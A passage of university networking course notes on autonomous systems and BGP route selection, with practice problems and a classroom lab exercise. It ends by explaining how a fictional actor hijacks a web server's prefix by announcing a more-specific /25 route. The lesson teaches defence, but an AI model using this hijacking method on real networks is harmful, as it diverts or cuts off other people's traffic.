Suppose, though, that Provider Network X is really ElCheapo Inc, and is only concerned with cost, and so has assigned
the edge weights to measure cost. For Provider Network X, which promotes itself as "The cheapest ISP in town",
delay is not a concern.
Provider Network Y, on the other hand, is really SpeedyISP Inc, and is only concerned with delay, and so has assigned
the edge weights to measure delay. For Provider Network Y, which advertises itself as "The fastest ISP in town", cost
is not a concern.
Choosing a single routing algorithm that satisfies both Provider Network X and Provider Network Y will be
problematic. If the chosen algorithm minimizes the cost, Provider Network Y might be unhappy since the delays
might be intolerable. If the chosen algorithm minimizes the delay, Provider Network X might be unhappy since the
costs might be intolerable.
Even if we could find a routing algorithm that satisfies every organization on Earth (we can't!—but suspend disbelief
for a moment), other problems would remain. Would the Pentagon want its traffic to Afghanistan routed via Iran,
even if routers within Iran were along the ideal route? Even in peacetime, a country may decide that it would like
traffic that begins and ends in the country to stay exclusively within the country; for instance, we might want traffic
from San Diego to San Antonio to avoid Mexico, even though a straight line from San Diego to San Antonio would
travel through Mexico twice. In a commercial context, an organization might not want to carry traffic that begins on
a competitor's network and ends on another competitor's network, unless the competing networks are willing to pay.
In a nutshell, the problem is that the owners of individual networks each want to set their own rules for routing within
their networks, without being concerned with what rules others are electing to follow.
So, then, what to do?
The answer (remember, this is America, and we believe in freedom!): Let entities that own portions of the Internet run their
own routing algorithms, independent from what others might be doing!
II. Autonomous Systems
This problem is solved by partitioning the Internet into a number of separate networks, called Autonomous Systems (AS's).
The organization which owns the AS may independently choose the routing algorithm of its liking to be used within the AS.
If Organization X runs AS X, it is free to run a routing algorithm within its network that minimizes cost. If Organization Y
runs AS Y, it is free to run a routing algorithm within its network that minimizes delay. We say that each AS runs an interior
routing algorithm, which is, in common parlance, referred to as an interior gateway protocol. The Internet, thus, is actually a
collection of Autonomous Systems. There are approximately 48,500 Autonomous Systems connected to the Internet today.
398
Each AS is under the control of a single administrator. AS's range in size and scope from corporations (e.g., General Motors
is an AS) to large Internet Service Providers (e.g., Comcast is an AS). Again: each AS can decide how it wants to route within
its own AS.
1. The Powers that Be
Each autonomous system (whether small, medium, or large) is given an autonomous system number (ASN) by the Internet
Corporation for Assigned Names and Numbers (ICANN). Assigning an ASN follows a similar procedure as with the assignment
of blocks of IP addresses. Referring to the picture on page 297 of the notes:
1) The Internet Assigned Numbers Authority (IANA) distributes ASNs.
2) IANA allocates blocks of ASNs to the five Regional Internet Registries.
3) Each Regional Internet Registry will distribute the ASNs as autonomous systems are developed and require an
ASN.
4) Each ASN is a 32-bit unique identifier which is typically represented as a decimal value (e.g., AS6059 is the
University of Maryland).
Although there are different sizes of ASes, they are not categorized according to their size. Rather, they are categorized
according to how they are connected to other ASes.
2. AS Categories
Stub AS
a. A stub AS has only one connection to another AS
b. Data traffic either originates or terminates in a stub. In
other words, the stub autonomous system is either a source
or destination of data.
Stub Autonomous System
Multihomed AS
a. A multihomed AS may have more than one connection to other
ASes, but doesn’t allow data to transit through it.
b. This autonomous system is still either a source or destination of
data.
c. A customer network is a good example of a multihomed AS. In
the picture to the right, the customer network will not support
traffic that begins with a user in ISP 1 and is destined for a
destination user in ISP 2.
Multihomed Autonomous System
Transit AS
a. A transit AS is connected to more than one AS.
b. A transit AS allows traffic to pass through.
c. Provider networks and the backbones are examples of the
transit AS's. In the picture to the right, transit AS will support
traffic that begins with a user in ISP 1 and is destined for a
destination user in ISP 2.
Transit Autonomous System
399
Practice Problem 17.1
Consider the picture below, showing the interconnection of four AS's. Note that traffic can route from New York through Paris
and Cannes and eventually get to Bonn, but traffic that goes from New York to Berlin to Bonn and on to Stuttgart cannot
proceed onward to Cannes. What are the categories of each of the AS's?
AS2
AS3
AS1
AS4
Solution:
Practice Problem 17.2
Problems with routing protocols arise from issues of scalability or arise from issues of administration. Classify each of the
problems below as a problem of scalability or of administration.
(a)
(b)
(c)
(d)
Solution:
Verizon wants Netflix to pay for routing data through its network.
Routers can only hold a limited amount of table entries.
Extremely large routing tables cause delays in packet forwarding.
Brazil and Europe decided not to route their traffic through the United States to avoid NSA spying.
(a)
(b)
(c)
(d)
3. Routing with Autonomous Systems
We can route among multiple networks within a single AS by using the intra-domain (interior) routing protocol decided upon
by the organization exercising administrative control of the AS. But since each AS might be doing something different, how
do we interconnect AS's to communicate with each other?
This problem requires that each AS runs, in addition to its internal protocols, a global protocol that glues all of the AS's
together. This global routing protocol is variously referred to as an inter-AS routing protocol, an inter-domain routing protocol,
or an exterior gateway protocol. Specifically, the inter-domain protocol the Internet utilizes is the Border Gateway Protocol
(BGP). Thus, in the Internet, routing between AS's is done using BGP.
400
From Tanenbaum, Computer Networks, 4th ed, Prentice Hall
III. Overview of BGP
BGP is a complex protocol. Let's first learn to appreciate this protocol by looking at an example that abstracts away many of
the complexities. Let's begin by limiting the discussion to the routers that actually run the Border Gateway Protocol—the
routers that are on the boundary of one AS and have a connection to another AS. The diagram below, for example, shows two
AS's interconnected. In this case, routers R1 and R2 would run the BGP protocol. These two routers—R1 and R2—we term
BGP routers.
401
BGP routers see the graph of the Internet very differently from ordinary routers. To a BGP router, the Internet is a set of AS's
and the links connecting them. As a simplified example, BGP routers might see the Internet as the picture shown below, where
all nodes (A through K) are BGP routers.
K
From Tanenbaum, Computer Networks, 4th ed, Prentice Hall
Let's say that if we superimpose AS's onto this figure, we see the picture below.
AS6: Death to America
AS3: Comcast
AS2: Afghanistan
AS7: Verizon
AS1: Pentagon
AS5: Sprint
K
AS8: Starbucks
AS4: AT&T
Note that we see our three flavors of AS in the picture above:

Stub AS's have a single connection to the BGP graph. Thus, stub AS's cannot route traffic that begin and end at other
AS's. In the picture above, AS8 is a stub.

Multi-homed AS's connect to two different AS's but refuse to carry transit traffic. For example, in the figure above,
suppose AS2 is willing to send traffic originating within AS2 to either one of its neighbors (AS5 or AS6) and is willing
to accept traffic from either one of its neighbors, provided the traffic terminates at a user in AS2. But suppose that
AS2 is not willing to route traffic from AS5 to AS6. If these conditions hold, AS2 is a multi-homed AS.

Transit AS's are willing to carry transit traffic originating and ending in other AS's. For example, in the figure above,
if AS4 is willing to carry traffic from AS3 to AS5 (and vice versa), then AS4 is a transit AS.
Let's return to our picture of the Internet, focusing on Router F in AS1 and Router D in AS2:
402
AS6: Death to America
AS2: Afghanistan
AS1: Pentagon
K
Each BGP router maintains a routing table to other destinations. However, BGP keeps the full path in use for each destination.
BGP routers exchange tables with neighbors telling neighbors the exact path in use.
Let's focus on AS1, the Pentagon, which wants to send data to AS2, a US command center in Afghanistan. In terms of the BGP
graph, Router F wants to send traffic to Router D.
With BGP, each of Router F's neighbors—Router B, Router E, Router I and Router G—will tell Router F the full path they use
to reach Router D. Let's look at each in turn:
Hi Router F. When I want to reach Router D I take the path B –
C – D (which is AS3 – AS6 – AS2).
AS6: Death to America
AS3: Comcast
AS2: Afghanistan
AS1: Pentagon
K
AS6: Death to America
403
AS2: Afghanistan
AS1: Pentagon
AS5: Sprint
K
AS4: AT&T
Hi Router F. When I want to reach Router D I take the path I – J
– H – D (which is AS4 – AS5 – AS2).
AS6: Death to America
AS2: Afghanistan
AS7: Verizon
AS1: Pentagon
Hi Router F. When I want
K D I take the
to reach Router
path G – C – D (which is
AS7 – AS6 – AS2).
Note that an interesting thing happens when Router E starts to talk to Router F
404
AS6: Death to America
AS2: Afghanistan
AS1: Pentagon
K
Hi Router F. When I want to
reach Router D I take the path
E–F–…
AS4: AT&T
STOP RIGHT THERE! I'm not interested in your
route since it goes through me.
The point illustrated in the picture above bears repeating: An AS will not accept a route containing its own AS number because
this will cause a routing loop to occur.
So, now Router F looks at the information it has received:
To get to Router D in AS2:
Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2).
Go via Router I: The path will be: I – J – H – D (which is AS4 – AS5 – AS2)
Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2).
Here is where the beauty (and the complexity) of BGP enters into the picture: BGP allows the AS network administrator to
impose policies on how traffic is routed. These policies are manually entered into the BGP router. So, for instance, if the
network administrator of AS1 sets the policy rule:
No traffic originating in AS1 will transit through Router C: AS6
then the BGP Router F can immediately decide on the route from Router F to Router D by modifying the table above:
To get to Router D in AS2:
Go via Router B: The path will be: B – C – D (which is AS3 – AS6 – AS2).
Go via Router I: The path will be:
I – J – H – D (which is AS4 – AS5 – AS2)
Go via Router G: The path will be: G – C – D (which is AS7 – AS6 – AS2).
Let's conclude our Big Picture overview of BGP by summarizing what BGP does (and doesn't do).
A router running BGP:
 First attempts to find all paths from the router to a given destination…
 and then judges these paths against the policies of the AS administrator…
 and then selects a "good-enough" path to the destination that satisfies the policy constraints.
In the third bullet above, why did we say that BGP "selects a 'good-enough' path to the destination"? Why didn't we say that
BGP "selects an optimal path to the destination"?
The reason: BGP selects routes across multiple AS's, each having their own (potentially conflicting) definitions of optimality.
Whereas intra-domain routing algorithms (confined to operate within a single AS) can attempt to find a least-cost path, BGP
can only find a "good-enough" path that will work while satisfying policy constraints.
Thus BGP really only provides an indication of reachability—that is, the availability of routes from source to destination. BGP
makes no attempt to advertise routing optimality.
405
Unfortunately, BGP makes no attempt to provide security either—a topic we will explore.
Practice Problem 17.3
Consider the network shown below.
(a) What type of Autonomous System is AS3?
(b) What would happen if AS1 declared itself to be a multi-homed AS?
Solution:
(a)
(b)
Effect of BGP on Routing Tables
In Chapters 15 and 16 we showed how routing algorithms such as link-state routing and distance vector routing can be used to
build up routing tables within an isolated AS. In this chapter we showed how BGP routers can determine the routing decisions
for traffic that has to traverse multiple AS's.
This may leave you wondering: Do routers have two routing tables—one for routing with the AS and another for routing to a
different AS? The answer is: No, routers have a single routing table.
Once BGP routers have decided the correct paths to other autonomous systems, that information is then used to supplement the
existing routing tables for other routers within an AS. Put another way: the information gathered by BGP is incorporated into
the intra-domain routing tables.
IV. BGP Route Selection
So, how are BGP routes selected? Let's return to the notation where, from the viewpoint of a BGP router, the Internet is a
collection of interconnected AS's. Let's suppose, for example, that you are the BGP router for AS1 in the network shown
below.
Let's say that your goal is to send data to your friend in AS3. Note that your data can travel over three potential routes.
We will develop the BGP path selection algorithm incrementally. For starters, we will say that the BGP path selection algorithm
is shown in the flow chart below.
406
So, first and foremost, the AS policies are considered. After weighing the AS policies, the route that traverses the fewest
number of AS's is selected.
Practice Problem 17.4
You are the BGP router for AS1 in the network shown below, and you would like to send data to AS3.
(a) What path is used if the administrator for AS1 has set a policy that no data from AS1 may go to AS2?
(b) What path is used if the administrator for AS1 has set no specific local preferences?
Solution:
(a)
(b)
Note that the local preference does not need to be a binary go/no-go decision (such as "Do not route through AS2"). The local
preference can also be specified as an integer, where a higher integer indicates a more preferred path. 33 Local preferences can
also be applied to specific network prefixes rather than an entire AS. As indicated earlier, how local preferences are structured
is completely at the discretion of the network administrator. Part of BGP's strength is the high degree to which it can be
customized.
33
Note that in BGP local preferences, higher values indicate a stronger preference. This is different from the intra-domain
routing protocols we have examined for which lower weights were preferred (i.e., we choose paths with the lowest weight).
407
Practice Problem 17.5
Suppose that in the network below, the administrator for AS1 has set a policy that no data from AS1 may go to AS2.
Additionally, AS1 has set a local preference value of 500 on the AS4-AS5-AS3 path and a value of 100 on the AS6-AS7-AS3
path. Which path does data traverse from AS1 to AS3?
Solution:
It should be noted that we have only skimmed the surface of the BGP protocol. There are other attributes that can enter into
the path selection algorithm beyond those mentioned above (local preferences and least-number-of AS's-in-the-path).
How do ASs relate to me?
In an article first reported on the website Ars Technica in February 2014, telecommunication
companies Verizon and Cogent Communications had a disagreement over peering. 34 Cogent is
a large backbone provider and also provides Internet connectivity for a “small company” called
Netflix, which by some estimates accounts for over 30 percent of current Internet traffic.
Apparently, Netflix traffic was overwhelming the links to the Verizon network causing many packets to be dropped. However,
Verizon refused to upgrade its infrastructure. Note that Verizon and Cogent have multiple peering points throughout the US.
From Verizon’s viewpoint, Cogent was sending it way more traffic than Verizon sent to them and they should pay fees for any
upgrades. This resulted in Verizon customers perceiving Netflix and anything else traversing those communications links as
being slow or unresponsive. To alleviate problems such as this, Netflix has resulted to making deals with Internet Service
Providers such as Comcast, Verizon, and AT&T to directly connect to their networks and deliver traffic.
Each company in this situation has networks large enough to be ASes. BGP is the mechanism for how these ASes advertise
routing information to each other. When two ASes feud as above, it can have a noticeable effect on their customer’s Internet
experience.
34
See http://arstechnica.com/information-technology/2014/02/netflix-packets-being-dropped-every-day-because-verizonwants-more-money/ for more details.
408
Problems
1.
Which of the following are examples of why a single-protocol internet would be a concern? (Choose all that apply)
a.
b.
c.
d.
2.
Across the globe, individual network administrators each want to set their own rules for routing within their
networks without being concerned with what rules others are electing to follow.
The world's network administrators unanimously agree on the best single routing algorithm that satisfies all of
their respective networking and routing needs.
Under a single-protocol internet structure, searching for a destination would be extremely time-consuming.
Under a single-protocol internet structure, updating the routing tables would create excessive amounts of
needless traffic.
Fill in the appropriate Autonomous System (AS) category or categories under each of the descriptions
(Choose from: Stub, Multihomed, and Transit)
below.
a.
An AS is connected to more than one other AS and it allows traffic to pass through it.
b.
An AS has only one connection to another AS, and it can act as a source or destination of data.
c.
An AS may be connected to one or more ASs, and it does not allow data to pass through it, but it can still act
as a source or destination of data.
d.
A 'Provider Network' is a good example of this type of AS.
e.
A 'Customer Network' is a good example of this type of AS.
3.
True or False. BGP provides an indication of reachability which ensures that the optimal route is advertised. Explain
your answer.
4.
Refer to Figure 1 below and label each AS with its correct category: Stub, Multihomed, or Transit. (Assume AS4 is
set up to pass along traffic originating from and ending in other
AS's, but AS2 will not do this.)
Figure 1: Four Autonomous Systems
5.
State and briefly describe the two problems solved by partitioning the Internet into a number of separate
Autonomous Systems vice using a single routing protocol.
6.
If I want to use a method beside use of local preferences to ensure that our traffic does not go through ASs that are not
trusted or that are unfriendly, I would
409
a. secure my BGP Routers to ensure no traffic is transmitted.
b. buy all the ASs between the source and destination so I know I could trust them.
c. ignore any advertised routes that contain those dangerous ASs.
d. use MD5-hash on the link state packets I transmitted.
410
Security Exercise 17
Part 1: Initial Setup
Let’s put to use the networking skills we have learned to date
to better understand how the Internet works and where our
traffic is supposed to go.
1. Set-Up
Man, I love cyber! I also love basketball.
Who am I and how many inches did I
grow as a mid?
Equipment needed:
 A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet
at the back of this exercise and have them ready to fill in.
 Your issued Laptop.
o Ensure Chrome or Firefox is installed on your Windows
computer.
o Turn up the volume on your computer.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your
issued laptop.
o Wait for an IP address to be assigned to your LAN
interface.
o Verify by pressing the Windows Orb key and in the
program search bar, type
cmd
Hit enter to launch the Windows terminal and then, at the command prompt, execute
ipconfig
411
Now, your screen should look similar to the figure below. Your Ethernet adapter should be
assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is
a number between 101 and 254. If not, notify your instructor or lab technician.
Part 2: Welcome to the EC310 Internet!
1. A Quick Review
Once again, locate EC310 MID on your network diagram. Your Windows laptop has just joined the
virtual network you connected to previously in SX#15 and SX#16. Specifically, your Ethernet card has
been assigned an IP address on this virtual network. As before, in order for your packets to leave this
virtual network and venture out into the virtual world, your laptop must send them to a Gateway Router.
Router A serves this purpose again for the network you are connected to. However, in order to send
your packets to Router A, your computer must know several things first. Answer the following
questions using the information from ipconfig.
Question 1: What is your network address and network mask in CIDR notation?
Question 2: What is the default Gateway’s IP address?
Question 3: What protocol would your computer use to identify the MAC address of the default
Gateway?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 4: Why would your computer need to know the MAC address of the default Gateway to reach
the Internet?
New to this virtual world are a number of Autonomous Systems (ASes) which comprise the EC310
Internet. You are located in AS2016, the virtual US Naval Academy. Two Internet Service Providers
(ISPs) connect AS2016 to the remainder of the Internet: (1) AS20, Bay Area Broadband and (2) AS30,
Chesapeake Cable. The Naval Academy connects to two ISPs to provide redundancy in their
communication infrastructure and balance network traffic during peak demand. However, they do not
wish to carry traffic from Bay Area Broadband to Chesapeake Cable or vice versa.
Question 5: What category of Autonomous System is AS2016?
Question 6: What category of Autonomous System are AS20 and AS30?
For your Internet traffic to leave AS2016 it must reach Router 16. Router A does not have a direct
connection to Router 16 and therefore must learn how to reach it.
Question 7: What protocol will Router A use to discover the optimal path to the Router 16?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 8: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Router A discovers the optimal path to Router 16 is through a direct connection to Router C via the
2.2.2.0/29 network. Router C will forward all traffic destined for addresses external to AS2016 to
Router 16. Router 16 will decide where to forward these packets using information it has gained about
the Internet from Router 20 in AS20 and Router 30 in AS30.
412
Question 9: What protocol will Router 16 use with Router 20 and Router 30 to learn where to reach a
destination on the Internet?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 10: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol
2. A Brief Respite
Let’s be honest. It’s been a little rough these past ten weeks learning about the stack-based buffer
overflow and how computer networks interconnect. Wouldn’t it be nice for a break for a change? Have
no fear. The ECE Department, universally known as the The Caring Department, has come to your aid
once again. For your viewing pleasure, in this virtual world there is a new website located at
http://www.midtube.com.
 Verify the website www.midtube.com exists by opening Firefox or Chrome on your Windows
computer (i.e., not you Cyber2 VM) and navigating to the website address.
 Log in by creating a username and password of your choice (do not use a username or password
you would not like exposed).
 Browse the website to see what information is available.
Question 11: What does the Zoomie say?
3. How Do I Get There Again?
Of course nothing is ever easy in EC310 and neither is the process to reach the MidTube webserver
across the EC310 Internet. Router 16 is responsible for directing your Internet traffic to this website and
as you just learned in Chapter 17, it goes through a path selection algorithm to determine where to send
your web requests. To better understand how this path selection algorithm works, it is important to
know what information Router 16 will receive about the Internet from its neighboring ASes. Let’s work
backwards from the target destination, MidTube’s webserver, to construct this information.
First, the MidTube webserver is located on the network 17.17.200.0/24, which is originally
advertised by Router 5 to Router 50 in AS50 and Router 60 in AS60. Once Router 50 hears about this
network, it will apply its own BGP path selection algorithm to determine if there are any local
preferences which would reject or select the path suggested by Router 5 to reach network
17.17.200.0/24. If there are no local preferences, it will compare the path received from Router 5
with all other paths that Router 50 has learned to reach 17.17.200.0/24 to determine if the path
through R5 has the shortest AS-path length. If this is true, Router 50 will prepend (i.e., put in front) its
own AS number to the AS-path list to indicate that 17.17.200.0/24 can be reached through AS50.
Router 50 will then forward this new announcement on to all other peers via a BGP update message.
Question 12: Assuming no local preferences are set, what path will Router 50 advertise to all other
peers to reach network 17.17.200.0/24?
 Label part a) on your network diagram with the network address and the AS-Path that Router 50
will announce to all other peers.
Once Router 30 learns about network 17.17.200.0/24 from Router 50, it will also apply its own
BGP path selection algorithm, prepend its AS number to the selected path, and announce this network
and path to its BGP peers.
Question 13: Assuming no local preferences are set, what path will Router 30 advertise to all other
peers to reach 17.17.200.0/24?
 Label part b) on your network diagram with the network address and the AS-Path that Router 30
will announce to all other peers.
Router 20 will also learn about possible paths to network 17.17.200.0/24 from its peers in a similar
fashion. It connects with another ISP, AS40, Monsoon Megabyte and a startup web hosting company,
413
AS2003, based in Eastern Europe. The web hosting company welcomes all traffic to it, but it does not
provide transit between autonomous systems.
Question 14: Assuming no local preferences are set, what path will Router 20 advertise to its peers to
reach 17.17.200.0/24?
 Label part c) on your network diagram with the network address and the AS-Path that Router 20
will announce to all other peers.
Finally, Router 16 will learn about the network 17.17.200.0/24 from both Router 20 and Router
30. It will also apply its own BGP path selection algorithm to decide which path it should use in order
to reach the network 17.17.200.0/24 which contains the MidTube webserver.
Question 15: Assuming no local preferences are set and comparing your answers to parts b) and c) on
your network diagram, what path will Router 16 select to get to the MidTube webserver on network
17.17.200.0/24?
 Draw a line on your network diagram of the selected path starting from EC310 MID going all the
way to the MidTube webserver.
Recall from SX#15 and SX#16 that there are two methods to discover information about the actual route
traversed between you and destination IP address. The first method is the utility ping with record
route, which tells you the IP addresses of the OUTGOING interfaces along the way to and from the final
destination. The second method is the utility traceroute, which works similar to ping except it
tells you the address of the INCOMING interface along the path between you and your destination.
Windows has both utilities available, but we will only use the utility traceroute for this security
exercise. Additionally, it is important to know this utility has a slightly different name in Windows,
tracert, as shown in the example in Figure 1 on page 4.
Question 16: Confirm your answer to Question 15 by performing a tracert (do not forget the –d
option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet.
Figure 1 – Example of tracert command.
414
Part 3: The Return of Prof. Evil
ITSD, after discovering the malicious behavior of Prof. Evil in SX#16, conducted a thorough security
review of all routers within the USNA network. They implemented several technical solutions to
prevent a malicious actor within AS2016 from injecting false routing information into the USNA
network.
Question 17: What are two technical solutions ITSD may have implemented to protect against false
route injection within the USNA network?
With his evil plans thwarted, Prof. Evil must now look for new ways to prevent midshipmen from
reaching websites of interest. Ever since the new security policies took place, he has become
increasingly abrasive in class. In fact, he completely skipped entire sections of the last lecture and
refused to complete practice problems in class. He even asked you to read the chapter notes on your
own (the audacity!). Reluctantly, you arrange for an EI session with Prof. Evil to help prepare for the
next exam, but upon arrival to his office he shouts at you to leave immediately. Embittered, you turn to
leave but notice out of the corner of your eye a web page on his computer, www.pta.net.
 Verify the website www.pta.net exists by opening Firefox or Chrome on your Windows
computer (i.e., not you Cyber2 VM) and navigating to the website address.
 Browse the website to see what information is available.
Question 18: What does the PTA believe concerning student’s time?
Question 19: What device was used as part of a novel in-class exercise to enhance STEM-based
learning?
It seems MIDN Roy may not be the only member of the Naval Academy with an extreme ideology.
Concerned, you decide to investigate things further by identifying the source of this propaganda.
Specifically, you want to know who is responsible for publishing this content and how it can be reached
across the Internet. You speak with ITSD about this matter and discover that AS2003 hosts network
21.200.3.0/24 where the PTA webserver is located. ITSD also informs you they have
implemented several local preferences in BGP to limit Prof. Evil’s impact on the other Internet users.
Specifically, AS30, Chesapeake Cable, is weighted over AS20, Bay Area Broadband, for all traffic
destined for network 21.200.3.0/24.
Question 20: Given your discoveries, what path will Router 16 select to reach the PTA webserver on
network 21.200.3.0/24?
Question 21: Confirm your answer to Question 20 using tracert (do not forget the –d option) to
identify the actual path to the PTA webserver. Did it match your expected results?
Your friend is confused. He looks at his network diagram and realizes the shortest AS path to network
21.200.3.0/24 is directly through AS20. Why would traffic destined for this network travel
through another route?
Question 22: What is the answer to your friend’s question? Explain.
415
Part 4: MidTube?
Exhausted from your detailed investigation, you decide to check if there are any new videos on
MidTube because sometimes you just don’t want to pay attention in class. To increase speed and
performance your web browser stores a local copy of the webpage so it does not have to access the
MidTube webserver as often. Unfortunately, this also means that new content might be missed unless
you force your web browser to refresh.
 Navigate to the website www.midtube.com.
 When directed, force your web browser to refresh www.midtube.com using either method
below.
Ctrl + Shift + R
Shift +
or
Question 23: Gasp… What shocking event just happened!?
Frustrated by EC310 yet again, you turn to your email and see the following note:
Dear EC310 Midshipmen,
I have reported you and your precious MidTube to the PTA! Your singing, dancing, and general
happiness are NOT furthering your education in my classes! Although ITSD has restricted my ability to
influence the USNA network, their authority ends at its border. Therefore, you will suffer under my
limited purview until you complete the attached assignment. Only then will I ask the PTA to restore
MidTube.
Never respectfully,
Prof. Evil
<SX19_An_Analysis_of_The_Rectabular_Excrusion_Bracket.docx>
To Be Continued… (in SX 18!)
Question 24 (Extra Credit): How was the PTA able to take down MidTube? (Hint: Think back to
SX#16)
Part 5: Clean Up
 Close all tabs in Chrome or Firefox.
 Disconnect the blue Ethernet cable.
 Turn on your wireless adapter.
416
Security Exercise 17 Answer Sheet
Name:
Question 1:
Question 2:
Question 3 (circle one):
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 4:
Question 5:
Question 6:
Question 7 (circle one):
Address Resolution Protocol
Question 8 (circle one):
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Question 9 (circle one):
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol
Question 10 (circle one):
Intra-domain Routing Protocol
Inter-domain Routing Protocol
Question 11:
417
Question 12: See part a) of your network diagram.
Question 13: See part b) of your network diagram.
Question 14: See part c) of your network diagram.
Question 15: Draw the selected path on your network diagram.
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24 (Extra Credit):
418
Network: _____._____._____._____ /____
c)
.2
.1
4.4.4.0/24
18.18.18.0/30
.1
AS 30
.2
.1
16.16.16.0/30
.1
.2
.2
.2
www.pta.net
21.200.3.2
AS 2003
Network: 17.17.200.0/24
AS-Path: 2005
R60 AS 60
14.14.14.0/30
.1
21.200.3.0/24
Network: 21.200.3.0/24
AS-Path: 2003
R3
SX18
ONLY
Network: _____._____._____._____ /____
.1
.2
.2
20.20.20.0/30
.1
R5
17.17.200.2
www.midtube.com
17.17.200.0/24
AS 2005
.2
AS-Path: _________________________
13.13.13.0/30
9.9.9.0/30
19.19.19.0/30
R30
15.15.15.0/30
EC310 Security Exercise 17 & 18
.2
.1
.1
8.8.8.0/30
.2
.2
AS 40
R40
.1
b)
7.7.7.0/30
AS 50
R50
a)
AS-Path: _________________________
Network: _____._____._____._____ /____
.2
12.12.12.0/30
Network: _____._____._____._____ /____
RA
AS-Path: ____________________________
.1
.2
Other USNA
Networks
R16
3.3.3.0/30
.1
AS-Path: _________________________
AS 20
.1
AS 2016
R20
RC
.2
2.2.2.0/29
.1
.10
?.?.?.?/??
419
420
Chapter 18: Border Gateway Protocol Routing
Objectives:
(a) Given a network diagram consisting of a limited number of connected Autonomous Systems (AS) and various BGP path
announcements, determine the direction of traffic across all ASes in accordance with the BGP path selection algorithm.
(b) Identify what is required to secure Internet routing, distinguish the negative and positive consequences of various proposed
solutions, and recognize the state of security in Internet routing today.
(c) Describe the steps that should be taken to prevent false route injection in or manipulation of the Internet routing system
and identify who is responsible for performing these preventative actions and how they can be applied.
(d) State the fundamental principle of communication as it relates to security.
When we last left off in Security Exercise 17, your viewing pleasure was rudely interrupted by Prof. Evil. Specifically, Prof.
Evil contacted the Professional Teaching Association (PTA), who took it upon themselves to disrupt access to MidTube for all
Internet users. But how did the PTA pull off such a feat? More importantly, why were they able to do this and how can they
be stopped?
I. Stealing the Internet: Network Prefix Hijacking
1. MidTube? The essence of the PTA’s attack rests on the same principles we saw at
work in Chapter 16. That is, the PTA had to take four distinct actions in order to deny
you access to the MidTube webserver.
1.
2.
3.
4.
Take control of a machine on the network and manipulate its operation.
Force the machine to tell the “right” kind of lie.
Force the machine to spread the lie around.
Force other machines to believe the lie.
The only change from Chapter 16 was the introduction of BGP and
its subsequent manipulation to facilitate the PTA’s objectives. By
generating the appropriate BGP route announcement, the PTA
forced their router to hijack the network prefix belonging to the
MidTube webserver making it look as if this prefix originated
within their own Autonomous System (AS). However, before we
dive into the details of their attack, let’s make sure we have the
correct understanding of where your traffic should go under normal
circumstances.
421
Stick ‘em up, partner! The Internet is
like the Wild West in many ways and
I am hijacking your network prefix!
Practice Problem 18.1
Consider the network diagram and BGP route announcement from Router 5 of AS2005 below. Assuming no local
preferences are set, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at
17.17.200.2?
16.16.16.0/30
.2
AS 40
21.200.3.0/24
R40
.2
AS 20
.1
15.15.15.0/30
.1
.2
.2
.2
.2
18.18.18.0/30
.1
12.12.12.0/30
R20
www.pta.net
21.200.3.2
13.13.13.0/30
.2
3.3.3.0/30
AS 2016
14.14.14.0/30
R30
.1
4.4.4.0/24
AS 2003
AS 30
.1
7.7.7.0/30
R16
RC
R3
.2
.1
.1
.2
.2
.2
.1
8.8.8.0/30
9.9.9.0/30
20.20.20.0/30
Other USNA
Networks
Network: 17.17.200.0/24
AS-Path: 2005
.1
.2
AS 50
2.2.2.0/29
RA
.1
R60 AS 60
.2
.1
R50
.1
.2
.1
19.19.19.0/30
R5
.1
17.17.200.0/24
.10
?.?.?.?/??
AS 2005
www.midtube.com
17.17.200.2
How might the PTA craft a BGP route announcement from Router 3 of AS2003 to alter this behavior? Again, because all
routers utilize the longest match matching principle, the PTA will force Router 3 to advertise a more specific network ID
containing the IP address of the MidTube webserver. As each neighboring AS learns of the new, more specific network
prefix, it will apply its own BGP path selection algorithm and forward BGP updates across the Internet promulgating the
PTA’s false information.
Practice Problem 18.2
What is the first and last IP address of the 17.17.200.0/24 network where the MidTube webserver is located?
(a) First Address:
(b) Last Address:
What network ID and mask should the PTA choose? Are there other options available?
Solution:
What is the first and last address of the false network the PTA advertised?
(a) First Address:
(b) Last Address:
Does the IP address of the MidTube webserver fall within the IP address block that the PTA advertised?
Solution:
Finally, given this false BGP route announcement from Router 3 of AS2003, what path will all packets leaving AS2016 take
in order to reach the MidTube webserver at 17.17.200.2?
422
Network: 17.17.200.0/25
AS-Path: 2003
16.16.16.0/30
.2
AS 40
21.200.3.0/24
R40
.2
AS 20
.1
15.15.15.0/30
.1
.2
.2
.2
.2
18.18.18.0/30
.1
12.12.12.0/30
R20
www.pta.net
21.200.3.2
13.13.13.0/30
.2
3.3.3.0/30
AS 2016
14.14.14.0/30
R30
.1
4.4.4.0/24
AS 2003
AS 30
.1
7.7.7.0/30
R16
RC
R3
.2
.1
.1
.2
.2
.2
.1
8.8.8.0/30
9.9.9.0/30
20.20.20.0/30
Other USNA
Networks
Network: 17.17.200.0/24
AS-Path: 2005
.1
.2
AS 50
2.2.2.0/29
RA
.1
R60 AS 60
.2
.1
R50
.1
.2
.1
R5
19.19.19.0/30
.1
17.17.200.0/24
.10
?.?.?.?/??
AS 2005
www.midtube.com
17.17.200.2
2. Why Does This Work? There are two reasons why prefix hijacking is possible in BGP:
1) There is no method within BGP to authenticate which network prefixes have been allocated to
Autonomous System Numbers (ASNs).
2) There is no method within BGP to authenticate which network prefixes can be originated by an ASN.
This point bears repeating: BGP does not provide a mechanism to authenticate the allocation or origin of a network prefix
